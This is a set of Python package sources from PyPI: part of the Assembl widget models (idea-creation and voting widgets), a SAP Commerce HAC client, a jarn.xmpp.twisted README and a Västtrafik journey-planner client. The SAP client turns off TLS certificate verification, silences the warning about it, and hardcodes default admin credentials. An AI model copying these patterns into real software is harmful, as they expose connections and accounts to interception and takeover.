            BaseIdeaWidgetLink,
            idea.id == BaseIdeaWidgetLink.idea_id).join(
            widget).filter(widget.id == parent_instance.id).filter(
            widget.id == BaseIdeaWidgetLink.widget_id,
            BaseIdeaWidgetLink.polymorphic_filter())
class BaseIdeaDescendantsCollection(AbstractCollectionDefinition):
    """The collection of the descendants of the ``base_idea`` of this :py:class:`BaseIdeaWidget`"""

    def __init__(self, name):
        super(BaseIdeaDescendantsCollection, self).__init__(
            BaseIdeaWidget, name, Idea)

    def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
        # Restrict to ideas that descend from the widget's base idea;
        # a no-op when the widget has no base idea link.
        widget = owner_alias
        descendant = last_alias
        link = parent_instance.base_idea_link
        if link:
            descendants_subq = link.idea.get_descendants_query()
            query = query.filter(
                descendant.id.in_(descendants_subq)).join(
                widget, widget.id == parent_instance.id)
        return query

    def contains(self, parent_instance, instance):
        # NOTE(review): implicitly returns None (falsy) when there is no
        # base idea link — confirm callers only rely on truthiness.
        descendant = aliased(Idea, name="descendant")
        link = parent_instance.base_idea_link
        if link:
            descendants_subq = link.idea.get_descendants_query()
            query = instance.db.query(descendant).filter(
                descendant.id.in_(descendants_subq)).join(
                Widget, Widget.id == parent_instance.id)
            return query.count() > 0
class IdeaCreatingWidget(BaseIdeaWidget):
    """A widget where new ideas are created"""
    __mapper_args__ = {
        'polymorphic_identity': 'idea_creating_widget',
    }

    # Links to the ideas created through this widget.
    generated_idea_links = relationship(GeneratedIdeaWidgetLink)

    def get_confirm_ideas_url(self):
        # URL to confirm proposed ideas; only when a base idea is set.
        idea_uri = self.settings_json.get('idea', None)
        if idea_uri:
            return ('local:Conversation/%d/widgets/%d/confirm_ideas') % (
                self.discussion_id, self.id)

    def get_confirm_messages_url(self):
        # URL to confirm proposal messages; only when a base idea is set.
        idea_uri = self.settings_json.get('idea', None)
        if idea_uri:
            return ('local:Conversation/%d/widgets/%d/confirm_messages') % (
                self.discussion_id, self.id)

    def get_confirmed_ideas(self):
        # TODO : optimize
        return [idea.uri() for idea in self.generated_ideas if not idea.hidden]

    def get_num_ideas(self):
        return len(self.generated_idea_links)

    def set_confirmed_ideas(self, idea_ids):
        # Hide every generated idea whose uri is not in idea_ids.
        for idea in self.generated_ideas:
            uri = idea.uri()
            hide = uri not in idea_ids
            idea.hidden = hide
            # p = idea.proposed_in_post
            # if p:
            #     p.hidden = hide

    def get_confirmed_messages(self):
        """URIs of non-hidden content/proposal posts under the base idea."""
        root_idea_id = self.base_idea_id()
        ids = self.db.query(Content.id).join(
            IdeaContentWidgetLink).join(
            Idea, IdeaContentWidgetLink.idea_id == Idea.id).join(
            IdeaLink, IdeaLink.target_id == Idea.id).filter(
            IdeaLink.source_id == root_idea_id, ~Content.hidden
            ).union(
                self.db.query(IdeaProposalPost.id).join(
                    Idea, IdeaProposalPost.idea_id == Idea.id).join(
                    IdeaLink, IdeaLink.target_id == Idea.id).filter(
                    IdeaLink.source_id == root_idea_id,
                    ~IdeaProposalPost.hidden)
            ).all()
        return [Content.uri_generic(id) for (id,) in ids]

    def set_confirmed_messages(self, post_ids):
        """Hide every post under the base idea whose uri is not in post_ids."""
        root_idea_id = self.base_idea_id()
        for post in self.db.query(Content).join(
                IdeaContentWidgetLink).join(
                Idea, IdeaContentWidgetLink.idea_id == Idea.id).join(
                IdeaLink, IdeaLink.target_id == Idea.id).filter(
                IdeaLink.source_id == root_idea_id).all():
            post.hidden = (post.uri() not in post_ids)
        for post in self.db.query(IdeaProposalPost).join(
                Idea, IdeaProposalPost.idea_id == Idea.id).join(
                IdeaLink, IdeaLink.target_id == Idea.id).filter(
                IdeaLink.source_id == root_idea_id).all():
            post.hidden = (post.uri() not in post_ids)

    def get_ideas_hiding_url(self):
        return 'local:Conversation/%d/widgets/%d/base_idea_hiding/-/children' % (
            self.discussion_id, self.id)

    @classmethod
    def extra_collections(cls):
        class BaseIdeaCollectionC(BaseIdeaCollection):
            """The BaseIdeaCollection for an IdeaCreatingWidget"""
            hide_proposed_ideas = False

            def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
                # Also join the generated-idea link of the child being created.
                query = super(BaseIdeaCollectionC, self).decorate_query(
                    query, owner_alias, last_alias, parent_instance, ctx)
                children_ctx = ctx.find_collection('Idea.children')
                if children_ctx:
                    gen_idea_link = aliased(GeneratedIdeaWidgetLink)
                    query = query.join(
                        gen_idea_link,
                        (gen_idea_link.idea_id ==
                            children_ctx.class_alias.id) & (
                            gen_idea_link.widget_id == owner_alias.id))
                return query

        class BaseIdeaHidingCollection(BaseIdeaCollectionC):
            """The BaseIdeaCollection for an IdeaCreatingWidget, which will hide
            created ideas."""
            hide_proposed_ideas = True

            def extra_permissions(self, permissions):
                """permission loophoole: allow participants (someone with the ADD_POST
                permission) to create (hidden) ideas in this context."""
                if P_ADD_POST in permissions and P_ADD_IDEA not in permissions:
                    return [P_ADD_IDEA]
                return []

        class BaseIdeaDescendantsCollectionC(BaseIdeaDescendantsCollection):
            hide_proposed_ideas = False

            def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
                # Also join the generated-idea link of the child being created.
                query = super(BaseIdeaDescendantsCollectionC, self).decorate_query(
                    query, owner_alias, last_alias, parent_instance, ctx)
                children_ctx = ctx.find_collection(
                    'Idea.children')
                if children_ctx:
                    gen_idea_link = aliased(GeneratedIdeaWidgetLink)
                    query = query.join(
                        gen_idea_link,
                        (gen_idea_link.idea_id ==
                            children_ctx.class_alias.id))
                return query

        @collection_creation_side_effects.register(
            inst_ctx=Idea, ctx='IdeaCreatingWidget.base_idea')
        @collection_creation_side_effects.register(
            inst_ctx=Idea, ctx='IdeaCreatingWidget.base_idea_descendants')
        def add_proposal_post(inst_ctx, ctx):
            """When an idea is created here, create its proposal post and
            a GeneratedIdeaWidgetLink back to the widget."""
            from .langstrings import LangString
            obj = inst_ctx._instance
            yield InstanceContext(
                inst_ctx['proposed_in_post'],
                IdeaProposalPost(
                    proposes_idea=obj,
                    creator=ctx.get_instance_of_class(User),
                    discussion=obj.discussion,
                    subject=(obj.short_title.clone()
                             if obj.short_title
                             else LangString.EMPTY(obj.db)),
                    body=(obj.definition.clone()
                          if obj.definition
                          else LangString.EMPTY(obj.db))))
            yield InstanceContext(
                inst_ctx['widget_links'],
                GeneratedIdeaWidgetLink(
                    idea=obj,
                    widget=ctx.get_instance_of_class(IdeaCreatingWidget)))

        @collection_creation_side_effects.register(
            inst_ctx=IdeaProposalPost, ctx='BaseIdeaWidget.base_idea')
        @collection_creation_side_effects.register(
            inst_ctx=IdeaProposalPost,
            ctx='IdeaCreatingWidget.base_idea_descendants')
        def add_proposal_post_link(inst_ctx, ctx):
            """Link the new proposal post to its idea through the widget."""
            obj = inst_ctx._instance
            yield InstanceContext(
                inst_ctx['idea_links_of_content'],
                IdeaContentWidgetLink(
                    content=obj, idea=obj.proposes_idea,
                    creator=obj.creator))

        @collection_creation_side_effects.register(
            inst_ctx=Idea, ctx='BaseIdeaWidget.base_idea_hiding')
        def hide_proposal_idea(inst_ctx, ctx):
            # Same as add_proposal_post, but the created idea starts hidden.
            obj = inst_ctx._instance
            obj.hidden = True
            for subctx in add_proposal_post(inst_ctx, ctx):
                yield subctx

        @collection_creation_side_effects.register(
            inst_ctx=IdeaProposalPost, ctx='BaseIdeaWidget.base_idea_hiding')
        def hide_proposal_post(inst_ctx, ctx):
            # Same as add_proposal_post_link, but the post starts hidden.
            obj = inst_ctx._instance
            obj.hidden = True
            for subctx in add_proposal_post_link(inst_ctx, ctx):
                yield subctx

        return (BaseIdeaCollectionC(),
                BaseIdeaHidingCollection('base_idea_hiding'),
                BaseIdeaDescendantsCollectionC('base_idea_descendants'))
# Ideas created through this widget, resolved via GeneratedIdeaWidgetLink.
IdeaCreatingWidget.generated_ideas = relationship(
    Idea, viewonly=True, secondary=GeneratedIdeaWidgetLink.__table__,
    primaryjoin=((IdeaCreatingWidget.id == GeneratedIdeaWidgetLink.widget_id)
                 & GeneratedIdeaWidgetLink.polymorphic_filter()),
    secondaryjoin=GeneratedIdeaWidgetLink.idea_id == Idea.id)
class InspirationWidget(IdeaCreatingWidget):
    """Widget presenting inspiration material (cards, videos) for an idea."""
    default_view = 'creativity_widget'
    __mapper_args__ = {
        'polymorphic_identity': 'inspiration_widget',
    }
    base_idea_link_class = IdeaInspireMeWidgetLink

    @property
    def configured(self):
        """True when at least one of the card/video modules is active."""
        modules = self.settings_json.get('active_modules', {})
        has_card = modules.get('card', None)
        has_video = modules.get('video', None)
        return bool(has_card or has_video)

    @classmethod
    def get_ui_endpoint_base(cls):
        # TODO: Make this configurable.
        return "/static/widget/creativity/"

    def get_add_post_endpoint(self, idea):
        """URL for posts linked to a given descendant of the base idea."""
        return 'local:Conversation/%d/widgets/%d/base_idea_descendants/%d/linkedposts' % (
            self.discussion_id, self.id, idea.id)
class CreativitySessionWidget(IdeaCreatingWidget):
    """Time-boxed collective idea-generation session around a base idea."""
    default_view = 'creativity_widget'
    __mapper_args__ = {
        'polymorphic_identity': 'creativity_session_widget',
    }

    @classmethod
    def get_ui_endpoint_base(cls):
        # TODO: Make this configurable.
        return "/static/widget/session/#home"

    def set_base_idea_id(self, id):
        # Like BaseIdeaWidget.set_base_idea_id, but always links through
        # an IdeaCreativitySessionWidgetLink.
        idea = Idea.get_instance(id)
        if self.base_idea_link:
            self.base_idea_link.idea_id = id
        else:
            self.base_idea_link = IdeaCreativitySessionWidgetLink(widget=self, idea=idea)
            self.db.add(self.base_idea_link)
        # This is wrong, but not doing it fails.
        self.base_idea = idea

    def notification_data(self, data):
        """Augment the notification settings with live session statistics."""
        end = data.get('end', None)
        time_to_end = (parse_datetime(end) - datetime.utcnow()
                       ).total_seconds() if end else None
        return dict(
            data,
            widget_url=self.uri(),
            time_to_end=time_to_end,
            num_participants=self.num_participants(),
            num_ideas=len(self.generated_idea_links))

    def num_participants(self):
        """Count distinct users who configured, commented on, or proposed
        ideas in this session."""
        participant_ids = set()
        # participants from user_configs
        participant_ids.update((c.user_id for c in self.user_configs))
        # Participants from comments
        # NOTE(review): these queries filter on Widget.id without an explicit
        # join to Widget — confirm the implicit join path is intended.
        participant_ids.update((c[0] for c in self.db.query(
            Post.creator_id).join(IdeaContentWidgetLink).filter(
            Widget.id == self.id)))
        # Participants from created ideas
        participant_ids.update((c[0] for c in self.db.query(
            IdeaProposalPost.creator_id).join(
            Idea, GeneratedIdeaWidgetLink).filter(
            Widget.id == self.id)))
        return len(participant_ids)

    def num_posts_by(self, user_id):
        """Number of widget posts authored by user_id in this widget."""
        from .post import WidgetPost
        return self.db.query(WidgetPost
            ).join(self.__class__
            ).filter(WidgetPost.creator_id==user_id).count()

    @property
    def num_posts_by_current_user(self):
        # None when there is no logged-in user.
        from ..auth.util import get_current_user_id
        user_id = get_current_user_id()
        if user_id:
            return self.num_posts_by(user_id)

    def get_add_post_endpoint(self, idea):
        """URL for creating widget posts under a child of the base idea."""
        return 'local:Conversation/%d/widgets/%d/base_idea/-/children/%d/widgetposts' % (
            self.discussion_id, self.id, idea.id)
class VotingWidget(BaseIdeaWidget):
    """Widget where users vote on "votable" ideas, possibly along criteria."""
    default_view = 'voting_widget'
    __mapper_args__ = {
        'polymorphic_identity': 'voting_widget',
    }

    votable_idea_links = relationship(VotableIdeaWidgetLink)
    voted_idea_links = relationship(VotedIdeaWidgetLink)
    criteria_links = relationship(
        VotingCriterionWidgetLink, backref="voting_widget")

    @classmethod
    def get_ui_endpoint_base(cls):
        # TODO: Make this configurable.
        return "/static/widget/vote/"

    def interpret_settings(self, settings):
        """Create the votable/criterion links described in the settings blob."""
        if "idea" not in settings and "votable_root_id" in settings:
            settings["idea"] = settings["votable_root_id"]
        super(VotingWidget, self).interpret_settings(settings)
        if 'criteria' in settings:
            for criterion in settings['criteria']:
                try:
                    criterion_idea = Idea.get_instance(criterion["@id"])
                    self.add_criterion(criterion_idea)
                except Exception as e:
                    # BUGFIX: `criterion` is a dict; the old string
                    # concatenation raised TypeError inside this handler.
                    # Use lazy %s formatting instead.
                    log.error("Missing criterion. Discarded. %s", criterion)
        if 'votables' in settings:
            for votable_id in settings['votables']:
                try:
                    votable_idea = Idea.get_instance(votable_id)
                    self.add_votable(votable_idea)
                except Exception as e:
                    log.error("Missing votable. Discarded. %s", votable_id)
        elif 'votable_root_id' in settings:
            try:
                votable_root_idea = Idea.get_instance(
                    settings['votable_root_id'])
            except Exception as e:
                log.error("Cannot find votable root. %s",
                          settings['votable_root_id'])
                return
            # Vote on the children of the root idea if any, else on the root.
            if len(votable_root_idea.children):
                for child in votable_root_idea.children:
                    self.add_votable(child)
            else:
                self.add_votable(votable_root_idea)

    @property
    def criteria_url(self):
        return 'local:Conversation/%d/widgets/%d/criteria' % (
            self.discussion_id, self.id)

    @property
    def votespecs_url(self):
        return 'local:Conversation/%d/widgets/%d/vote_specifications' % (
            self.discussion_id, self.id)

    @property
    def votables_url(self):
        return 'local:Conversation/%d/widgets/%d/targets/' % (
            self.discussion_id, self.id)

    def get_user_votes_url(self, idea_id):
        return 'local:Conversation/%d/widgets/%d/targets/%d/votes' % (
            self.discussion_id, self.id, Idea.get_database_id(idea_id))

    def all_voting_results(self):
        """Voting results keyed by vote specification URI."""
        return {
            spec.uri(): spec.voting_results()
            for spec in self.vote_specifications
        }

    def get_voting_urls(self, target_idea_id):
        # TODO: Does not work yet.
        return {
            AbstractVoteSpecification.uri_generic(vote_spec.id):
            'local:Conversation/%d/widgets/%d/vote_specifications/%d/vote_targets/%d/votes' % (
                self.discussion_id, self.id, vote_spec.id,
                Idea.get_database_id(target_idea_id))
            for vote_spec in self.vote_specifications
        }

    def get_voting_results_by_spec_url(self):
        return {
            AbstractVoteSpecification.uri_generic(vote_spec.id):
            'local:Conversation/%d/widgets/%d/vote_specifications/%d/vote_results' % (
                self.discussion_id, self.id, vote_spec.id)
            for vote_spec in self.vote_specifications
        }

    def add_criterion(self, idea):
        """Link an idea as a voting criterion, if not already linked."""
        if idea not in self.criteria:
            self.criteria_links.append(VotingCriterionWidgetLink(
                widget=self, idea=idea))

    def remove_criterion(self, idea):
        """Unlink an idea from the voting criteria."""
        for link in self.criteria_links:
            if link.idea == idea:
                self.criteria_links.remove(link)
                return

    @property
    def configured(self):
        """True when votables, vote specs and per-item specs are present."""
        if not bool(len(self.votable_idea_links)
                    and len(self.vote_specifications)):
            return False
        items = self.settings_json.get('items', ())
        return bool(len(
            [item for item in items
             if item.get('vote_specifications', None)]))

    def set_criteria(self, ideas):
        """Make the criterion links match exactly the given ideas."""
        idea_ids = {idea.id for idea in ideas}
        for link in list(self.criteria_links):
            if link.idea_id not in idea_ids:
                self.criteria_links.remove(link)
                self.db.delete(link)
            else:
                idea_ids.remove(link.idea_id)
        for idea in ideas:
            if idea.id in idea_ids:
                self.criteria_links.append(VotingCriterionWidgetLink(
                    widget=self, idea=idea))

    def add_votable(self, idea):
        """Link an idea as a voting target, if not already linked."""
        if idea not in self.votable_ideas:
            self.votable_idea_links.append(VotableIdeaWidgetLink(
                widget=self, idea=idea))

    def remove_votable(self, idea):
        """Unlink an idea from the voting targets."""
        for link in self.votable_idea_links:
            if link.idea == idea:
                self.votable_idea_links.remove(link)
                return

    def set_votables(self, ideas):
        """Make the votable links match exactly the given ideas."""
        idea_ids = {idea.id for idea in ideas}
        for link in list(self.votable_idea_links):
            if link.idea_id not in idea_ids:
                self.votable_idea_links.remove(link)
                self.db.delete(link)
            else:
                idea_ids.remove(link.idea_id)
        for idea in ideas:
            if idea.id in idea_ids:
                self.votable_idea_links.append(VotableIdeaWidgetLink(
                    widget=self, idea=idea))

    @classmethod
    def extra_collections(cls):
        class CriterionCollection(RelationCollectionDefinition):
            # The set of voting criterion ideas.
            # Not to be confused with http://www.criterion.com/
            def __init__(self, cls):
                super(CriterionCollection, self).__init__(
                    cls, cls.criteria)

            def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
                widget = owner_alias
                idea = last_alias
                return query.join(idea.has_criterion_links).join(
                    widget).filter(widget.id == parent_instance.id)

        @collection_creation_side_effects.register(
            inst_ctx=Idea, ctx='VotingWidget.criteria')
        def add_criterion_link(inst_ctx, ctx):
            # Link newly-created criterion ideas back to the widget.
            yield InstanceContext(
                inst_ctx['has_criterion_links'],
                VotingCriterionWidgetLink(idea=inst_ctx._instance,
                                          widget=ctx.owner_alias))

        @collection_creation_side_effects.register(
            inst_ctx=AbstractIdeaVote, ctx='VotingWidget.criteria')
        def add_criterion_relation(inst_ctx, ctx):
            criterion_ctx = ctx.find_collection(
                'VotingWidget.criteria')
            # find instance context above me
            search_ctx = ctx
            while (search_ctx.__parent__ and
                   search_ctx.__parent__ != criterion_ctx):
                search_ctx = search_ctx.__parent__
            assert search_ctx.__parent__
            inst_ctx._instance.criterion = search_ctx._instance

        class VotableCollection(RelationCollectionDefinition):
            # The set of votable ideas.
            def __init__(self, cls):
                super(VotableCollection, self).__init__(
                    cls, cls.votable_ideas, "targets")

            def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
                widget = owner_alias
                idea = last_alias
                query = query.join(idea.has_votable_links).join(
                    widget).filter(widget.id == parent_instance.id)
                return query

        @collection_creation_side_effects.register(
            inst_ctx=Idea, ctx='VotingWidget.targets')
        def add_votable_link(inst_ctx, ctx):
            # NOTE(review): add_criterion_link uses ctx.owner_alias for the
            # widget while this uses ctx.parent_instance — confirm which is
            # intended; left as found.
            yield InstanceContext(
                inst_ctx['has_votable_links'],
                VotableIdeaWidgetLink(
                    idea=inst_ctx._instance,
                    widget=ctx.parent_instance))

        return (CriterionCollection(cls),
                VotableCollection(cls))

    # @property
    # def criteria(self):
    #     return [cl.idea for cl in self.criteria_links]
class MultiCriterionVotingWidget(VotingWidget):
    """VotingWidget mapped to the 'multicriterion_voting_widget' identity."""
    __mapper_args__ = {
        'polymorphic_identity': 'multicriterion_voting_widget',
    }
class TokenVotingWidget(VotingWidget):
    """VotingWidget mapped to the 'token_voting_widget' identity."""
    __mapper_args__ = {
        'polymorphic_identity': 'token_voting_widget',
    }
class WidgetUserConfig(DiscussionBoundBase):
    """Per-user configuration state for a widget, stored as a JSON blob."""
    __tablename__ = "widget_user_config"
    id = Column(Integer, primary_key=True)
    # Owning widget; configs are cascade-deleted with the widget.
    widget_id = Column(
        Integer,
        ForeignKey('widget.id',
                   ondelete="CASCADE", onupdate="CASCADE"),
        nullable=False, index=True)
    widget = relationship(Widget, backref=backref(
        "user_configs", cascade="all, delete-orphan"))
    # User this configuration belongs to.
    user_id = Column(
        Integer,
        ForeignKey('user.id',
                   ondelete="CASCADE", onupdate="CASCADE"),
        nullable=False, index=True)
    user = relationship(User)
    # Raw serialized state; the column is named 'settings' in the table.
    state = Column('settings', Text)  # JSON blob
    @property
    def state_json(self):
        """The state blob decoded as JSON; {} when no state is stored."""
        if self.state:
            return json.loads(self.state)
        return {}
    @state_json.setter
    def state_json(self, val):
        # Serialize and store the given structure as the new state.
        self.state = json.dumps(val)
    def get_discussion_id(self):
        """Return the id of the discussion this config belongs to."""
        widget = self.widget or Widget.get(self.widget_id)
        return widget.get_discussion_id()
    @classmethod
    def get_discussion_conditions(cls, discussion_id, alias_maker=None):
        """Join conditions tying this table to a given discussion."""
        return ((cls.widget_id == Widget.id),
                (Widget.discussion_id == discussion_id))
    # Read-only shortcut to the discussion, joined through the widget table.
    discussion = relationship(
        Discussion, viewonly=True, uselist=False, secondary=Widget.__table__,
        info={'rdf': QuadMapPatternS(None, ASSEMBL.in_conversation)})
    crud_permissions = CrudPermissions(P_ADD_POST)  # all participants...
# Attach link collections to Idea so widget links can be traversed from
# the idea side.
Idea.has_votable_links = relationship(VotableIdeaWidgetLink)
Idea.has_voted_links = relationship(VotedIdeaWidgetLink)
Idea.has_criterion_links = relationship(VotingCriterionWidgetLink)
# Ideas that can be voted on through a given voting widget.
VotingWidget.votable_ideas = relationship(
    Idea, viewonly=True, secondary=VotableIdeaWidgetLink.__table__,
    primaryjoin=((VotingWidget.id == VotableIdeaWidgetLink.widget_id)
                 & VotableIdeaWidgetLink.polymorphic_filter()),
    secondaryjoin=VotableIdeaWidgetLink.idea_id == Idea.id,
    backref='votable_by_widget')
# Ideas that have received votes through a given voting widget.
VotingWidget.voted_ideas = relationship(
    Idea, viewonly=True, secondary=VotedIdeaWidgetLink.__table__,
    primaryjoin=((VotingWidget.id == VotedIdeaWidgetLink.widget_id)
                 & VotedIdeaWidgetLink.polymorphic_filter()),
    secondaryjoin=VotedIdeaWidgetLink.idea_id == Idea.id,
    backref="voted_by_widget")
# Ideas used as voting criteria by a given voting widget.
VotingWidget.criteria = relationship(
    Idea,
    viewonly=True, secondary=VotingCriterionWidgetLink.__table__,
    primaryjoin=((VotingWidget.id == VotingCriterionWidgetLink.widget_id)
                 & VotingCriterionWidgetLink.polymorphic_filter()),
    secondaryjoin=VotingCriterionWidgetLink.idea_id == Idea.id,
    backref='criterion_of_widget')
|
PypiClean
|
/sapcx-0.1.2-py3-none-any.whl/src/api.py
|
import os
import re
import requests
from urllib3.exceptions import InsecureRequestWarning
# HAC instances typically run with a self-signed certificate; suppress the
# warning that would otherwise be emitted for every unverified HTTPS request.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class SAPAPI:
    """Thin client for the SAP Commerce (hybris) administration console (HAC).

    Handles session-cookie login, CSRF token scraping and authenticated
    GET/POST requests against the HAC web interface.
    """

    def __init__(self, username='admin', password='nimda', hacurl='https://localhost:9002'):
        """Store credentials and prepare the local cache directory."""
        self.username = username
        self.password = password
        self.hacurl = hacurl
        self.sessionid = None
        # Directory used to persist the session id between CLI invocations.
        self.cache_dir = os.path.join(os.path.expanduser('~'), '.sap-cli')
        # exist_ok avoids a race between the check and the creation.
        os.makedirs(self.cache_dir, exist_ok=True)
        # try loading session id from cache
        # self.sessionid = self.__load_session_id_from_cache()

    @staticmethod
    def __get_csrf_token(hacurl, sessionid) -> str:
        """Scrape the CSRF token from the page at *hacurl*.

        Returns None when the request fails or no token is present
        (previously an IndexError when the meta tag was missing).
        """
        r = requests.get(hacurl, verify=False, cookies={'JSESSIONID': sessionid})
        if r.ok:
            csrfs = re.findall(r'<meta name="_csrf" content="(.*)" />', r.text)
            if csrfs:
                return csrfs[0]
        return None

    @staticmethod
    def __get_session_id(hacurl) -> str:
        """Fetch a fresh JSESSIONID cookie from *hacurl*, or None."""
        r = requests.get(hacurl, verify=False, allow_redirects=False)
        if r.ok:
            return r.cookies.get('JSESSIONID')
        return None

    def get(self, path, params) -> requests.Response:
        """Perform an authenticated GET against *path*.

        Raises ConnectionError when no session id is set or the request fails.
        """
        self.__validate_session_id()
        r = requests.get(self.hacurl + path, verify=False, params=params,
                         cookies={'JSESSIONID': self.sessionid},
                         allow_redirects=False, timeout=5)
        if not r.ok:
            raise ConnectionError(f"Get request to {path} failed with status code {r.status_code}")
        return r

    def post(self, path, data) -> requests.Response:
        """Perform an authenticated POST with a CSRF token.

        A rotated JSESSIONID cookie in the response replaces the cached one.
        Raises ConnectionError when no session id is set or the request fails.
        """
        self.__validate_session_id()
        csrf = self.__get_csrf_token(self.hacurl, self.sessionid)
        r = requests.post(self.hacurl + path, verify=False, data=data,
                          headers={'X-CSRF-TOKEN': csrf},
                          cookies={'JSESSIONID': self.sessionid},
                          allow_redirects=False, timeout=5)
        if r.ok and r.cookies.get('JSESSIONID'):
            self.sessionid = r.cookies.get('JSESSIONID')
        if not r.ok:
            raise ConnectionError(f"Post request to {path} failed with status code {r.status_code}")
        return r

    def login(self):
        """Authenticate against Spring Security and cache the session id.

        Raises ConnectionError on a missing session or bad credentials.
        """
        self.sessionid = self.__get_session_id(self.hacurl)
        self.__save_session_id_to_cache(self.sessionid)
        self.__validate_session_id()
        csrf = self.__get_csrf_token(self.hacurl + '/login', self.sessionid)
        data = {
            'j_username': self.username,
            'j_password': self.password,
            '_csrf': csrf
        }
        r = self.post('/j_spring_security_check', data)
        if r.status_code == 302:
            # Spring redirects to a login_error URL on bad credentials.
            location = r.headers.get('Location')
            if location and re.match(r'.*login_error.*', location):
                raise ConnectionError("Invalid username/password")

    def __load_session_id_from_cache(self):
        """Return the cached session id, or None when no cache file exists."""
        cache_file = os.path.join(self.cache_dir, 'session')
        if os.path.exists(cache_file):
            with open(cache_file, 'r') as c:
                return c.read().strip()
        return None

    def __save_session_id_to_cache(self, sessionid):
        """Persist *sessionid* to the cache file (no-op when it is falsy).

        Renamed from the misspelled __save_session_id_to_chache; the name is
        private (name-mangled) and only used within this class. Writing is
        skipped for a falsy id, which previously raised TypeError on None.
        """
        if not sessionid:
            return
        cache_file = os.path.join(self.cache_dir, 'session')
        with open(cache_file, 'w+') as c:
            c.write(sessionid)

    def __validate_session_id(self):
        """Raise ConnectionError unless a non-empty session id is cached."""
        if not self.sessionid:
            raise ConnectionError("Missing session id")
|
PypiClean
|
/jarn.xmpp.twisted-0.1a1.zip/jarn.xmpp.twisted-0.1a1/README.txt
|
Introduction
============
``jarn.xmpp.twisted`` provides a basis for building XMPP applications with Plone.
In short, ``jarn.xmpp.twisted`` includes:
* Extensions to the `wokkel`_ package by implementing parts of the following XMPP extensions:
* `XEP-0071`_ XHTML-IM.
* `XEP-0144`_ Roster Item Exchange.
* `XEP-0060`_ Publish-Subscribe.
* `XEP-0248`_ PubSub Collection Nodes.
* `XEP-0133`_ Service Administration.
* A `Twisted`_ reactor that runs side-by-side with the Zope instance.
* Utilities that provide XMPP clients of two sorts: a *deferred* client that connects, executes a task and disconnects as soon as it is done, and a persistent client that remains connected and can respond to XMPP events.
* An XMPP component base class for writing custom components.
``jarn.xmpp.twisted`` is part of a suite, with the other packages being:
* `jarn.xmpp.core`_, provides facilities for presence, messaging, chatting and microblogging.
* `jarn.xmpp.collaboration`_ provides an XMPP protocol to do real-time collaborative editing as well as a Plone-targeted implementation.
Installation
============
``jarn.xmpp.twisted`` requires a working XMPP server installation. Please refer to the `jarn.xmpp.core`_ documentation on how to set it up.
Credits
=======
* Most of this work was done using the 10% time available to `Jarn AS`_ employees for the development of open-source projects.
.. _Twisted: http://twistedmatrix.com
.. _wokkel: http://wokkel.ik.nu
.. _XEP-0071: http://xmpp.org/extensions/xep-0071.html
.. _XEP-0144: http://xmpp.org/extensions/xep-0144.html
.. _XEP-0060: http://xmpp.org/extensions/xep-0060.html
.. _XEP-0248: http://xmpp.org/extensions/xep-0248.html
.. _XEP-0133: http://xmpp.org/extensions/xep-0133.html
.. _Jarn AS: http://jarn.com
.. _jarn.xmpp.core: http://pypi.python.org/pypi/jarn.xmpp.core
.. _jarn.xmpp.collaboration: http://pypi.python.org/pypi/jarn.xmpp.collaboration
|
PypiClean
|
/vtjp-0.1.14.tar.gz/vtjp-0.1.14/vasttrafik/journy_planner.py
|
import base64
import json
import requests
from datetime import datetime
from datetime import timedelta
# OAuth2 token endpoint and REST base URL of the Vasttrafik API.
TOKEN_URL = 'https://api.vasttrafik.se/token'
API_BASE_URL = 'https://api.vasttrafik.se/bin/rest.exe/v2'
# Date/time formats expected by the API's query parameters.
DATE_FORMAT = '%Y-%m-%d'
TIME_FORMAT = '%H:%M'
class Error(Exception):
    """Raised when a Vasttrafik API request returns a non-success status."""
    pass
def _get_node(response, *ancestors):
""" Traverse tree to node """
document = response
for ancestor in ancestors:
if ancestor not in document:
return {}
else:
document = document[ancestor]
return document
class JournyPlanner:
    """Client for the Vasttrafik (Sweden) journey planner REST API v2.

    The public spellings ("Journy", "expiery") are kept unchanged for
    backward compatibility with existing callers.
    """

    def __init__(self, key, secret, expiery=59):
        """Store credentials and fetch an initial OAuth2 token.

        :param key: API consumer key
        :param secret: API consumer secret
        :param expiery: minutes a token is used before being refreshed
        """
        self._key = key
        self._secret = secret
        self._expiery = expiery
        self.update_token()

    def update_token(self):
        """Fetch a new bearer token via the client-credentials grant."""
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Authorization': 'Basic ' + base64.b64encode(
                (self._key + ':' + self._secret).encode()).decode()
        }
        data = {'grant_type': 'client_credentials'}
        response = requests.post(TOKEN_URL, data=data, headers=headers)
        obj = json.loads(response.content.decode('UTF-8'))
        if 'access_token' not in obj:
            # Surface authentication problems instead of a bare KeyError.
            raise Error('Token request failed: ' + str(obj))
        self._token = obj['access_token']
        self._token_expire_date = (
            datetime.now() +
            timedelta(minutes=self._expiery))

    # LOCATION
    def location_allstops(self):
        """Return all stop locations (location.allstops)."""
        response = self._request('location.allstops')
        return _get_node(response, 'LocationList', 'StopLocation')

    def location_nearbystops(self, origin_coord_lat, origin_coord_long):
        """Return stops near a coordinate (location.nearbystops)."""
        response = self._request(
            'location.nearbystops',
            originCoordLat=origin_coord_lat,
            originCoordLong=origin_coord_long)
        return _get_node(response, 'LocationList', 'StopLocation')

    def location_nearbyaddress(self, origin_coord_lat, origin_coord_long):
        """Return the address closest to a coordinate (location.nearbyaddress)."""
        response = self._request(
            'location.nearbyaddress',
            originCoordLat=origin_coord_lat,
            originCoordLong=origin_coord_long)
        return _get_node(response, 'LocationList', 'CoordLocation')

    def location_name(self, name):
        """Search stop locations matching *name* (location.name)."""
        response = self._request('location.name', input=name)
        return _get_node(response, 'LocationList', 'StopLocation')

    # ARRIVAL BOARD
    def arrivalboard(self, stop_id, date=None, direction=None):
        """Return the arrival board for a stop (arrivalBoard).

        :param stop_id: id of the stop
        :param date: datetime of the board; defaults to now
        :param direction: optional stop id to filter arrivals by direction
        """
        date = date if date else datetime.now()
        request_parameters = {
            'id': stop_id,
            'date': date.strftime(DATE_FORMAT),
            'time': date.strftime(TIME_FORMAT)
        }
        if direction:
            # Bug fix: this was previously sent as 'directiona', so the
            # API silently ignored the direction filter.
            request_parameters['direction'] = direction
        response = self._request('arrivalBoard', **request_parameters)
